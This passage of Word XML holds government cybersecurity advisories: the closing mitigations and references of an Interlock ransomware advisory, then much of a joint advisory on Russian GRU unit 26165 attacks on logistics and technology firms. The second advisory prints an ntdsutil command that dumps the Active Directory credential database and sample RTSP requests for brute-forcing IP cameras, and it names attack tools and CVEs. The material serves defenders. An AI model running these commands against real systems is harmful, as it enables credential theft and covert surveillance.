        <w:t>Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.E].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable unused ports.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Consider adding an email banner to emails received from outside of your organization [CPG 2.M].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable hyperlinks in received emails.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement time-based access for accounts set at the admin level and higher; for example, the just-in-time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model): This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable command line and scripting activities and permissions [CPG 2.N]. Disabling software utilities that run from the command line makes it more difficult for threat actors to escalate privileges and move laterally. Maintain offline backups of data and regularly maintain backups and restorations [CPG 2.R]; this avoids severe service interruption and irretrievable data in the event of a compromise.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization's data infrastructure [CPG 2.R]. Validate Security Controls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addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.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 get started: Select an ATT&amp;CK technique described in this advisory (see Table 5 through Table 16).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Align your security technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test your technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Analyze your detection and prevention technologies' performance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Tune your security program, including people, processes, and technologies, based on the data generated by this process.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authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory. Resources Stopransomware.gov: Whole-of-government, central location for ransomware resources and alerts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>HHS Cyber Gateway: Contains key resources for HPH entities to bolster their cyber resilience.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>#StopRansomware Guide: Resource to mitigate a ransomware attack.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cyber Hygiene Services, Ransomware Readiness Assessment: CISA's no-cost cyber hygiene services.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>MS-ISAC Services: MS-ISAC's no-cost cybersecurity services for state, local, tribal, and territorial (SLTT) entities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ransomware Defense-in-Depth: MS-ISAC guidance for SLTT entities to mitigate the threat of ransomware using a defense-in-depth strategy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Combatting Ransomware: MS-ISAC guidance on ransomware mitigation strategies aligned with recommendations from NIST and CSF. Reporting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Your organization has no obligation to respond or provide information back to FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws.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FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.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Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.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The authoring agencies do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to FBI's Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency's Incident Reporting System or its 24/7 Operations Center (contact@mail.cisa.dhs.gov) or by calling 1-844-Say- CISA (1-844-729-2472).</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State, local, tribal, and territorial governments should report incidents to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).</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HPH Sector organizations should report incidents to FBI or CISA but also can reach out to HHS at HHScyber@hhs.gov for cyber incident support focused on mitigating adverse patient impacts. Disclaimer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information in this report is being provided "as is" for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favor by the authoring agencies. Acknowledgements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Cisco Talos contributed to this advisory. Version History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July 22, 2025: Initial version. Notes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 Elio Biasiotto, et. al., "Unwrapping the Emerging Interlock Ransomware Attack," Talos Intelligence (blog), Cisco Talos, last modified November 7, 2024, https://blog.talosintelligence.com/emerging-interlock-ransomware/.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 Sekoia Threat Detection and Research team, "Interlock Ransomware Evolving Under the Radar," Sekoia (blog), Sekoia, last modified April 16, 2025, https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/.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 Yashvi Shah and Vignesh Dhatchanamoorthy, "ClickFix Deception: A Social Engineering Tactic to Deploy Malware," McAfee Labs (blog), McAfee,last modified June 11, 2024, https://www.mcafee.com/blogs/other-blogs/mcafee- labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/ and "HC3 Sector Alert: ClickFix Attacks," Health Sector Cybersecurity Coordination Center, Department of Health and Human Services, last modified October 29, 2024, https://www.hhs.gov/sites/default/files/clickfix-attacks- sector-alert-tlpclear.pdf.</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 Shah, "ClickFix Deception: A Social Engineering Tactic to Deploy Malware."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 Sekoia Threat Detection and Research team, "Interlock Ransomware Evolving Under the Radar."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 Bill Toulas, "Interlock Ransomware Gang Deploys New NodeSnake RAT on Universities," Bleeping Computer, May 28, 2025, https://www.bleepingcomputer.com/news/security/interlock-ransomware-gang- deploys-new-nodesnake-rat-on-universities/.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 Biasiotto, "Unwrapping the Emerging Interlock Ransomware Attack."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 International law-enforcement and Microsoft took down the Lumma Stealer malware in May 2025 by seizing internet domains the actors used to distribute the malware to actors and taking down domains that hosted the malware's infrastructure. For more information, see Tara Seals, "Lumma Stealer Takedown Reveals Sprawling Operation," Dark Reading, May 21, 2025, https://www.darkreading.com/cybersecurity-operations/lumma-stealer-takedown- sprawling-operation, and Steven Masada, "Disrupting Lumma Stealer: Microsoft Leads Global Action Against Favored Cybercrime Tool," Microsoft On the Issues (blog), Microsoft, last modified May 21, 2025, https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global- action-against-favored-cybercrime-tool/.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 Sekoia Threat Detection and Research team, "Interlock Ransomware Evolving Under the Radar."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 Biasiotto, "Unwrapping the Emerging Interlock Ransomware Attack."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 Biasiotto, "Unwrapping the Emerging Interlock Ransomware Attack."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12 Biasiotto, "Unwrapping the Emerging Interlock Ransomware Attack."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 Biasiotto, "Unwrapping the Emerging Interlock Ransomware Attack."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 Lawrence Abrams, "Meet Interlock - The New Ransomware Targeting FreeBSD Servers," Bleeping Computer, November 3, 2024, https://www.bleepingcomputer.com/news/security/meet-interlock-the-new- ransomware-targeting-freebsd-servers/.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15 Biasiotto, "Unwrapping the Emerging Interlock Ransomware Attack."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16 Graham Cluley, "Interlock Ransomware: What You Need to Know," Fortra (blog), Fortra, last modified May 30, 2025, https://www.tripwire.com/state- of-security/interlock-ransomware-what-you-need-know.</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17 Sekoia Threat Detection and Research team, "Interlock Ransomware Evolving Under the Radar."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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2025.07.22 17:49</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Russian GRU Targeting Western Logistics Entities and Technology Companies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Release Date May 21, 2025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Alert Code AA25-141A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Cybersecurity Best Practices, Critical Infrastructure Security and Resilience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Executive Summary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joint cybersecurity advisory (CSA) highlights a Russian state- sponsored cyber campaign targeting Western logistics entities and technology companies. This includes those involved in the coordination, transport, and delivery of foreign assistance to Ukraine. Since 2022, Western logistics entities and IT companies have faced an elevated risk of targeting by the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (85th GTsSS), military unit 26165-tracked in the cybersecurity community under several names (see "Cybersecurity Industry Tracking"). The actors' cyber espionage-oriented campaign, targeting technology companies and logistics entities, uses a mix of previously disclosed tactics, techniques, and procedures (TTPs). The authoring agencies expect similar targeting and TTP use to continue.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Executives and network defenders at logistics entities and technology companies should recognize the elevated threat of unit 26165 targeting, increase monitoring and threat hunting for known TTPs and indicators of compromise (IOCs), and posture network defenses with a presumption of targeting.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cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors' wide scale targeting of IP cameras in Ukraine and bordering NATO nations.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following authors and co-sealers are releasing this CSA: United States National Security Agency (NSA) United States Federal Bureau of Investigation (FBI) United Kingdom National Cyber Security Centre (NCSC-UK) Germany Federal Intelligence Service (BND) Bundesnachrichtendienst Germany Federal Office for Information Security (BSI) Bundesamt f"ur Sicherheit in der Informationstechnik Germany Federal Office for the Protection of the Constitution (BfV) Bundesamt f"ur Verfassungsschutz Czech Republic Military Intelligence (VZ) Vojensk'e zpravodajstv'i Czech Republic National Cyber and Information Security Agency (N'UKIB) N'arodn'i 'urad pro kybernetickou a informacn'i bezpecnost Czech Republic Security Information Service (BIS) Bezpecnostn'i informacn'i sluzba Poland Internal Security Agency (ABW) Agencja Bezpiecze'nstwa Wewnetrznego Poland Military Counterintelligence Service (SKW) Sluzba Kontrwywiadu Wojskowego United States Cybersecurity and Infrastructure Security Agency (CISA) United States Department of Defense Cyber Crime Center (DC3) United States Cyber Command (USCYBERCOM) Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC) Canadian Centre for Cyber Security (CCCS) Danish Defence Intelligence Service (DDIS) Forsvarets Efterretningstjeneste Estonian Foreign Intelligence Service (EFIS) V"alisluureamet Estonian National Cyber Security Centre (NCSC-EE) K"uberturvalisuse keskus French Cybersecurity Agency (ANSSI) Agence nationale de la s'ecurit'e des syst`emes d'information Netherlands Defence Intelligence and Security Service (MIVD) Militaire Inlichtingen- en Veiligheidsdienst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Download the PDF version of this report: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Russian GRU Targeting Western Logistics Entities and Technology Companies (PDF, 1,081KB)</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a downloadable list of IOCs, visit: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AA25-141A STIX XML (XML, 117.02 KB )</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AA25-141A STIX JSON (JSON, 144.29 KB ) Introduction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over two years, the Russian GRU 85th GTsSS, military unit 26165- commonly known in the cybersecurity community as APT28, Fancy Bear, Forest Blizzard, BlueDelta, and a variety of other identifiers-has conducted this campaign using a mix of known tactics, techniques, and procedures (TTPs), including reconstituted password spraying capabilities, spearphishing, and modification of Microsoft Exchange mailbox permissions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>In late February 2022, multiple Russian state-sponsored cyber actors increased the variety of cyber operations for purposes of espionage, destruction, and influence-with unit 26165 predominately involved in espionage. [1] As Russian military forces failed to meet their military objectives and Western countries provided aid to support Ukraine's territorial defense, unit 26165 expanded its targeting of logistics entities and technology companies involved in the delivery of aid. These actors have also targeted Internet-connected cameras at Ukrainian border crossings to monitor and track aid shipments.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Note: This advisory uses the MITRE ATT&amp;CK(R) for Enterprise framework, version 17. See Appendix A: MITRE ATT&amp;CK tactics and techniques for a table of the threat actors' activity mapped to MITRE ATT&amp;CK tactics and techniques. This advisory uses the MITRE D3FEND(R) framework, version 1.0. Description of Targets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GRU unit 26165 cyber campaign against Western logistics providers and technology companies has targeted dozens of entities, including government organizations and private/commercial entities across virtually all transportation modes: air, sea, and rail. These actors have targeted entities associated with the following verticals within NATO member states, Ukraine, and at international organizations: Defense Industry Transportation and Transportation Hubs (ports, airports, etc.) Maritime Air Traffic Management IT Services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course of the targeting lifecycle, unit 26165 actors identified and conducted follow-on targeting of additional entities in the transportation sector that had business ties to the primary target, exploiting trust relationships to attempt to gain additional access [T1199].</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actors also conducted reconnaissance on at least one entity involved in the production of industrial control system (ICS) components for railway management, though a successful compromise was not confirmed [TA0043].</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The countries with targeted entities include the following, as illustrated in Figure 1: Bulgaria Czech Republic France Germany Greece Italy Moldova Netherlands Poland Romania Slovakia Ukraine United States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 Countries with Targeted Entities Initial Access TTPs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 gain initial access to targeted entities, unit 26165 actors used several techniques to gain initial access to targeted entities, including (but not limited to): Credential guessing [T1110.001] / brute force [T1110.003] Spearphishing for credentials [T1566] Spearphishing delivering malware [T1566] Outlook NTLM vulnerability (CVE-2023-23397) Roundcube vulnerabilities (CVE-2020-12641, CVE-2020-35730, CVE-2021-44026) Exploitation of Internet-facing infrastructure, including corporate VPNs [T1133], via public vulnerabilities and SQL injection [T1190] Exploitation of WinRAR vulnerability (CVE-2023-38831)</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actors abused vulnerabilities associated with a range of brands and models of small office/home office (SOHO) devices to facilitate covert cyber operations, as well as proxy malicious activity via devices with geolocation in proximity to the target [T1665]. [2] Credential Guessing/Brute Force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Unit 26165 actors' credential guessing [T1110.001] operations in this campaign exhibit some similar characteristics to those disclosed in the previous CSA "Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments." [3] Based on victim network investigations, the current iteration of this TTP employs a similar blend of anonymization infrastructure, including the use of Tor and commercial VPNs [T1090.003]. The actors frequently rotated the IP addresses used to further hamper detection. All observed connections were made via encrypted TLS [T1573]. Spearphishing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GRU unit 26165 actors' spearphishing emails included links [T1566.002] leading to fake login pages impersonating a variety of government entities and Western cloud email providers' webpages. These webpages were typically hosted on free third-party services or compromised SOHO devices and often used legitimate documents associated with thematically similar entities as lures. The subjects of spearphishing emails were diverse and ranged from professional topics to adult themes. Phishing emails were frequently sent via compromised accounts or free webmail accounts [T1586.002, T1586.003]. The emails were typically written in the target's native language and sent to a single targeted recipient.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campaigns employed multi-stage redirectors [T1104] verifying IP- geolocation [T1627.001] and browser fingerprints [T1627] to protect credential harvesting infrastructure or provide multifactor authentication (MFA) [T1111] and CAPTCHA relaying capabilities [T1056]. Connecting endpoints failing the location checks were redirected to a benign URL [T1627], such as msn.com. Redirector services used include: Webhook[.]site FrgeIO InfinityFree Dynu Mocky Pipedream Mockbin[.]org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actors also used spearphishing to deliver malware (including HEADLACE and MASEPIE) executables [T1204.002] delivered via third-party services and redirectors [T1566.002], scripts in a mix of languages [T1059] (including BAT [T1059.003] and VBScript [T1059.005]) and links to hosted shortcuts [T1204.001]. CVE Usage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Throughout this campaign, GRU unit 26165 weaponized an Outlook NTLM vulnerability (CVE-2023-23397) to collect NTLM hashes and credentials via specially crafted Outlook calendar appointment invitations [T1187]. [4],[5] These actors also used a series of Roundcube CVEs (CVE-2020-12641, CVE-2020- 35730, and CVE-2021-44026) to execute arbitrary shell commands [T1059], gain access to victim email accounts, and retrieve sensitive data from email servers [T1114].</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Since at least fall 2023, the actors leveraged a WinRAR vulnerability (CVE- 2023-38831) allowing for the execution of arbitrary code embedded in an archive as a means of initial access [T1659]. The actors sent emails with malicious attachments [T1566.001] or embedded hyperlinks [T1566.002] that downloaded a malicious archive prepared using this CVE. Post-Compromise TTPs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an initial compromise using one of the above techniques, unit 26165 actors conducted contact information reconnaissance to identify additional targets in key positions [T1589.002]. The actors also conducted reconnaissance of the cybersecurity department [T1591], individuals responsible for coordinating transport [T1591.004], and other companies cooperating with the victim entity [T1591.002].</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actors used native commands and open source tools, such as Impacket and PsExec, to move laterally within the environment [TA0008]. Multiple Impacket scripts were used as .exe files, in addition to the python versions, depending on the victim environment. The actors also moved laterally within the network using Remote Desktop Protocol (RDP) [T1021.001] to access additional hosts and attempt to dump Active Directory NTDS.dit domain databases [T1003.003] using native Active Directory Domain Services commands, such as in Figure 2: Example Active Directory Domain Services command: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C:\Windows\system32\ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit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2: Example Active Directory Domain Services command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Additionally, GRU unit 26165 actors used the tools Certipy and ADExplorer.exe to exfiltrate information from the Active Directory. The actors installed python [T1059.006] on infected machines to enable the execution of Certipy. Accessed files were archived in .zip files prior to exfiltration [T1560]. The actors attempted to exfiltrate archived data via a previously dropped OpenSSH binary [T1048].</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Incident response investigations revealed that the actors would take steps to locate and exfiltrate lists of Office 365 users and set up sustained email collection. The actors used manipulation of mailbox permissions [T1098.002] to establish sustained email collection at compromised logistics entities, as detailed in a Polish Cybercommand blog. [6]</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After initial authentication, unit 26165 actors would change accounts' folder permissions and enroll compromised accounts in MFA mechanisms to increase the trust-level of compromised accounts and enable sustained access [T1556.006]. The actors leveraged python scripts to retrieve plaintext passwords via Group Policy Preferences [T1552.006] using Get- GPPPassword.py and a modified ldap-dump.py to enumerate the Windows environment [T1087.002] and conduct a brute force password spray [T1110.003] via Lightweight Directory Access Protocol (LDAP). The actors would additionally delete event logs through the wevtutil utility [T1070.001].</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gaining initial access to the network, the actors pursued further access to accounts with access to sensitive information on shipments, such as train schedules and shipping manifests. These accounts contained information on aid shipments to Ukraine, including: sender, recipient, train/plane/ship numbers, point of departure, destination, container registration numbers, travel route, and cargo contents.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at least one instance, the actors attempted to use voice phishing [T1566.004] to gain access to privileged accounts by impersonating IT staff. Malware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Unit 26165's use of malware in this campaign ranged from gaining initial access to establishing persistence and exfiltrating data. In some cases, the attack chain resulted in multiple pieces of malware being deployed in succession. The actors used dynamic link library (DLL) search order hijacking [T1574.001] to facilitate malware execution. There were a number of known malware variants tied to this campaign against logistics sector victims, including: HEADLACE [7] MASEPIE [8]</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other malware variants, such as OCEANMAP and STEELHOOK, [8] were not directly observed targeting logistics or IT entities, their deployment against victims in other sectors in Ukraine and other Western countries suggest that they could be deployed against logistics and IT entities should the need arise. Persistence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addition to the abovementioned mailbox permissions abuse, unit 26165 actors also used scheduled tasks [T1053.005], run keys [T1547.001], and placed malicious shortcuts [T1547.009] in the startup folder to establish persistence. Exfiltration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GRU unit 26165 actors used a variety of methods for data exfiltration that varied based on the victim environment, including both malware and living off the land binaries. PowerShell commands [T1059.001] were often used to prepare data for exfiltration; for example, the actors prepared zip archives [T1560.001] for upload to their own infrastructure.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actors also used server data exchange protocols and Application Programming Interfaces (APIs) such as Exchange Web Services (EWS) and Internet Message Access Protocol (IMAP) [T1114.002] to exfiltrate data from email servers. In multiple instances, the actors used periodic EWS queries [T1119] to collect new emails sent and received since the last data exfiltration [T1029]. The actors typically used infrastructure in close geographic proximity to the victim. Long gaps between exfiltration, the use of trusted and legitimate protocols, and the use of local infrastructure allowed for long-term collection of sensitive data to go undetected. Connections to Targeting of IP Cameras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addition to targeting logistics entities, unit 26165 actors likely used access to private cameras at key locations, such as near border crossings, military installations, and rail stations, to track the movement of materials into Ukraine. The actors also used legitimate municipal services, such as traffic cams.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actors targeted Real Time Streaming Protocol (RTSP) servers hosting IP cameras primarily located in Ukraine as early as March 2022 in a large- scale campaign, which included attempts to enumerate devices [T1592] and gain access to the cameras' feeds [T1125]. Actor-controlled servers sent RTSP DESCRIBE requests destined for RTSP servers, primarily hosting IP cameras [T1090.002]. The DESCRIBE requests were crafted to obtain access to IP cameras located on logically distinct networks from that of the routers that received the request. The requests included Base64-encoded credentials for the RTSP server, which included publicly documented default credentials and likely generic attempts to brute force access to the devices [T1110]. An example of an RTSP request is shown in Figure 3.</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DESCRIBE rtsp://[IP ADDRESS] RTSP/1.0</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CSeq: 1</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Authorization: Basic &lt;Base64-encoded credentials&gt;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User-Agent: WebClient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Accept: application/sdp</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DESCRIBE rtsp://[IP ADDRESS] RTSP/1.0</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CSeq: 2</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Authorization: Digest username="admin", realm="[a-f0-9]{12}", algorithm="MD5", nonce="[a-f0-9]{32}", uri="", response="[a-f0-9]{32}"</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User-Agent: WebClient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Accept: application/sdp</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3: Example RTSP request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Successful RTSP 200 OK responses contained a snapshot of the IP camera's image and IP camera metadata such as video codec, resolution, and other properties depending on the IP camera's configuration.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From a sample available to the authoring agencies of over 10,000 cameras targeted via this effort, the geographic distribution of victims showed a strong focus on cameras in Ukraine and border countries, as shown in Table 1: Table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1: Geographic distribution of targeted IP cameras Country Percentage of Total Attempts Ukraine 81.0% Romania 9.9% Poland 4.0% Hungary 2.8% Slovakia 1.7% Others 0.6% Mitigation Actions General Security Mitigations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Architecture and Configuration Employ appropriate network segmentation [D3-NI] and restrictions to limit access and utilize additional attributes (such as device information, environment, and access path) when making access decisions [D3-AMED]. Consider Zero Trust principles when designing systems. Base product choices on how those products can solve specific risks identified as part of the end-to-end design. [9] Ensure that host firewalls and network security appliances (e.g., firewalls) are configured to only allow legitimately needed data flows between devices and servers to prevent lateral movement [D3-ITF]. Alert on attempts to connect laterally between host devices or other unusual data flows.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use automated tools to audit access logs for security concerns and identify anomalous access requests [D3-RAPA].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>For organizations using on-premises authentication and email services, block and alert on NTLM/SMB requests to external infrastructure [D3-OTF]. Utilize endpoint, detection, and response (EDR) and other cybersecurity solutions on all systems, prioritizing high value systems with large amounts of sensitive data such as mail servers and domain controllers [D3- PM] first.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Perform threat and attack modeling to understand how sensitive systems may be compromised within an organization's specific architecture and security controls. Use this to develop a monitoring strategy to detect compromise attempts and select appropriate products to enact this strategy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Collect and monitor Windows logs for certain events, especially for events that indicate that a log was cleared unexpectedly [D3-SFA].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
